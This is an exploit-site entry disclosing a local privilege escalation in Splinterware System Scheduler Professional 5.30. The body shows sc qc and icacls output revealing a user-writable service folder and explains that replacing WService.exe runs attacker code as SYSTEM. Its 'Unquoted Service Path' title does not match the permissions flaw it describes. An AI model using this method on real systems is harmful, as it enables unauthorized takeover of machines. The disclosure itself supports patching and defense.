Exploit for Splinterware System Scheduler Professional 5.30 Unquoted Service Path

Name: Exploit for Splinterware System Scheduler Professional 5.30 Unquoted Service Path
Rating: 5 (102 reviews)
2021-05-12 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:162540
# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path  
# Date: 2021-05-11  
# Exploit Author: Andrea Intilangelo  
# Vendor Homepage: https://www.splinterware.com  
# Software Link: https://www.splinterware.com/download/ssproeval.exe  
# Version: 5.30 Professional  
# Tested on: Windows 10 Pro 20H2 x64  
  
System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting  
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with  
elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;  
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one  
will be executed after a short while.  
  
C:\Users\test>sc qc WindowsScheduler  
[SC] QueryServiceConfig OPERAZIONI RIUSCITE  
  
NOME_SERVIZIO: WindowsScheduler  
TIPO : 10 WIN32_OWN_PROCESS  
TIPO_AVVIO : 2 AUTO_START  
CONTROLLO_ERRORE : 0 IGNORE  
NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe  
GRUPPO_ORDINE_CARICAMENTO :  
TAG : 0  
NOME_VISUALIZZATO : System Scheduler Service  
DIPENDENZE :  
SERVICE_START_NAME : LocalSystem  
  
C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\  
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)  
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)  
NT SERVICE\TrustedInstaller:(I)(F)  
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)  
BUILTIN\Administrators:(I)(F)  
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)  
BUILTIN\Users:(I)(RX)  
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)  
CREATOR OWNER:(I)(OI)(CI)(IO)(F)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)  
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)  
  
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file  
  
C:\Users\test>